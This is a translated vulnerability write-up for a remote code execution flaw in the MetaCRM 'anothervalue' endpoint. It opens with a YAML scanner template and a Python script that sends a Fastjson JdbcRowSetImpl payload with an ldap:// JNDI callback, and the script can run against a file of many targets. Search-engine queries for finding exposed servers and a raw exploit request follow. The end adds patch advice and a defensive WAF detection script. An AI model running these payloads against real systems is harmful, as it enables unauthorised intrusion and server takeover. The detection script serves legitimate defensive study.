Disclaimer: this article is shared as study notes for technical learning and reference only. Do not use it for any illegal purpose. Any direct or indirect consequences or losses caused by an individual or organization using the information provided here are the sole responsibility of the user and have nothing to do with this platform or the publisher!!!

PoC (YAML & Python)

Without further ado, here are the PoCs (the YAML PoC was generated by yakit or the ProjectDiscovery Cloud Platform, the Python PoC script was generated by ChatGPT; verify their accuracy yourself).

id: met-crm-remote-code-execution

info:
  name: Remote Code Execution in Met CRM
  author: onewin
  severity: critical
  description: Checks for RCE vulnerability in Met CRM via crafted JSON payload.
  tags: rce,cve,met-crm

requests:
  - method: POST
    path:
      - "{{BaseURL}}/eai/someValue/anotherValue"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Accept-Encoding: gzip, deflate, br
      Accept-Language: zh-CN,zh;q=0.9
      Cache-Control: no-cache
      Connection: close
      Content-Type: application/json
      Cookie: JSESSIONID=E010A1A6DED8C9644CFAB420D41F4EB7
      Pragma: no-cache
      Upgrade-Insecure-Requests: 1

    body: |
      {"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://{{interactsh-url}}","autoCommit":true}}


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "dns"
        part: interactsh_protocol # This checks if the DNS interaction contains expected data indicating exploitation success.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import argparse
import time
from requests.exceptions import RequestException
from urllib3.exceptions import InsecureRequestWarning

# Terminal colours for output
RED = '\033[91m'
RESET = '\033[0m'
# Suppress the warning for unverified TLS connections (verify=False below)
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# dnslog.cn ties the record lookup to the session cookie set when the
# subdomain was issued, so both calls must go through the same Session
dnslog_session = requests.Session()

def get_dnslog():
    # Request a fresh DNSlog subdomain
    response = dnslog_session.get('http://www.dnslog.cn/getdomain.php')
    return response.text.strip()

def check_dnslog(dnslog):
    # Poll the DNSlog records and report whether the subdomain was resolved
    check_url = f'http://www.dnslog.cn/getrecords.php?t={dnslog}'
    response = dnslog_session.get(check_url)
    return dnslog in response.text

def check_vulnerability(url,dnslog_url):
    # Python resolves the \uXXXX escapes at compile time, so the JSON actually
    # sent carries the plain key names ("@type", "dataSourceName"); only the raw
    # HTTP request in the write-up below keeps them escaped
    data = {
        "b": {
            "\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c",
            "\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":f"ldap://{dnslog_url}",
            "autoCommit": "true"
        }
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36',
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Content-Type': 'application/json',
        'Cookie': 'JSESSIONID=E010A1A6DED8C9644CFAB420D41F4EB7',
        'Cache-Control': 'no-cache',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Pragma': 'no-cache',
    }
    path = "/eai/someValue/anotherValue"
    try:
        response = requests.post(url + path, json=data, headers=headers, verify=False)
        time.sleep(5)
        if check_dnslog(dnslog_url):
            print(f"{RED}{url} 可能存在美特-crm anothervalue远程命令执行漏洞{RESET}")
        else:
            print(f"{url} 漏洞不存在")
    except requests.RequestException as e:
        print(f"请求失败: {e}")

def main():
    parser = argparse.ArgumentParser(description='检查目标URL是否存在美特-crm anothervalue远程命令执行漏洞。')
    parser.add_argument('-u', '--url', help='指定目标URL')
    parser.add_argument('-f', '--file', help='指定包含多个目标URL的文本文件')

    args = parser.parse_args()

    dnslog_url = get_dnslog()

    if args.url:
        check_vulnerability(args.url, dnslog_url)
    elif args.file:
        with open(args.file, 'r') as f:
            targets = f.read().splitlines()
            for target in targets:
                if not target.startswith("http://") and not target.startswith("https://"):
                    target = "http://" + target
                check_vulnerability(target, dnslog_url)

if __name__ == '__main__':
    main()

Vulnerability overview

MetaSoft (美特软件) is a professional CRM vendor and customer relationship management specialist. MetaCRM is an intelligent platform-based CRM product that aims to raise a company's management level and operational efficiency by improving enterprise management and collaborative office work. Its anothervalue interface has a remote code execution vulnerability that a malicious attacker can exploit to execute arbitrary commands and take control of the server. As the payload shows, the request body is JSON carrying a Fastjson-style @type autotype key that names com.sun.rowset.JdbcRowSetImpl, with dataSourceName set to an ldap:// URL; the \uXXXX escapes only obscure the key names, and the JSON parser decodes them before the class is instantiated and the JNDI lookup is made.

Asset discovery

  • 「Fofa」

body="/common/scripts/basic.js"

  • 「Hunter」

web.body="/common/scripts/basic.js"

  • 「Quake」

body="/common/scripts/basic.js"

Vulnerability reproduction

「1. Build the request」

POST /eai/someValue/anotherValue HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Length: 373
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Connection: close
Content-Type: application/json
Cookie: JSESSIONID=E010A1A6DED8C9644CFAB420D41F4EB7
Pragma: no-cache
Upgrade-Insecure-Requests: 1
cmd: whoami

{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://fpwnnkhmfn.dgrh3.cn","autoCommit":true}}

「2. Check the DNSlog records」

Remediation

The vendor has released a security patch; contact the vendor to apply it or upgrade to a fixed version.

Restrict access to interfaces that are not required.

Deploy a web application firewall and configure interception rules for the affected interface.
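A WAF rule for the last point has to recognise the request body from step 1 even when its key names are \uXXXX-escaped, which a plain substring match on "@type" misses. The script below is an added example written for this page (it is not the author's PoC and not MetaCRM code): it parses a JSON body, which decodes the escapes, and flags any object carrying an @type key, raising the level to "high" when the class is the JdbcRowSetImpl gadget or dataSourceName points at an ldap://, ldaps:// or rmi:// URL. The gadget-class list and the sample bodies are constructed for the example, and the host attacker.example is a placeholder.

```python
import json

# Constructed blocklist for this example: classes that turn a JSON autotype
# deserialization into a JNDI lookup. Extend it with your own gadget list.
JNDI_GADGET_CLASSES = {"com.sun.rowset.JdbcRowSetImpl"}
JNDI_SCHEMES = ("ldap://", "ldaps://", "rmi://")

# Constructed sample bodies; the ldap/rmi host is a placeholder, not a listener.
# Raw strings keep the \uXXXX sequences for json.loads to decode, as a server would.
ESCAPED_PAYLOAD = (
    r'{"b":{"\u0040\u0074\u0079\u0070\u0065":'
    r'"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074'
    r'\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c",'
    r'"\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":'
    r'"ldap://attacker.example/x","autoCommit":true}}'
)
PLAIN_PAYLOAD = ('{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
                 '"dataSourceName":"rmi://attacker.example/x","autoCommit":true}}')
BENIGN_BODY = '{"b":{"customerId":1042,"name":"test"}}'


def _walk(obj):
    """Yield every JSON object nested anywhere in a parsed document."""
    if isinstance(obj, dict):
        yield obj
        for value in obj.values():
            yield from _walk(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from _walk(value)


def inspect_body(raw_body):
    """Classify one request body.

    Levels: "none"; "medium" when any object carries an @type key, i.e. the
    client is trying to choose the server-side class; "high" when that class
    is a known JNDI gadget or dataSourceName is a JNDI URL.
    Parsing with json.loads normalises \\uXXXX escapes, so the escaped and the
    plain form of "@type" are treated identically.
    """
    try:
        doc = json.loads(raw_body)
    except ValueError:
        return {"level": "none", "reasons": ["not JSON"]}
    level, reasons = "none", []
    for node in _walk(doc):
        type_name = node.get("@type")
        if not isinstance(type_name, str):
            continue
        if level == "none":
            level = "medium"
        reasons.append(f"autotype key @type={type_name}")
        if type_name in JNDI_GADGET_CLASSES:
            level = "high"
            reasons.append(f"known JNDI gadget class {type_name}")
        target = node.get("dataSourceName")
        if isinstance(target, str) and target.lower().startswith(JNDI_SCHEMES):
            level = "high"
            reasons.append(f"JNDI lookup target {target}")
    return {"level": level, "reasons": reasons}


def scan_bodies(bodies):
    """Run inspect_body over (request_id, body) pairs and return the requests
    that should be blocked or alerted on, as (request_id, level, reasons)."""
    findings = []
    for request_id, body in bodies:
        verdict = inspect_body(body)
        if verdict["level"] != "none":
            findings.append((request_id, verdict["level"], verdict["reasons"]))
    return findings


if __name__ == "__main__":
    samples = [("req-1", ESCAPED_PAYLOAD), ("req-2", PLAIN_PAYLOAD), ("req-3", BENIGN_BODY)]
    for request_id, level, reasons in scan_bodies(samples):
        print(request_id, level, "; ".join(reasons))
```

Flagging every @type key, not only the known gadget, is deliberate: a CRM API has no legitimate reason to let the client name a Java class, so the "medium" level catches gadget classes that are not yet on the list. The same check can run over archived request bodies to find earlier exploitation attempts, and it should be paired with the vendor patch rather than replace it.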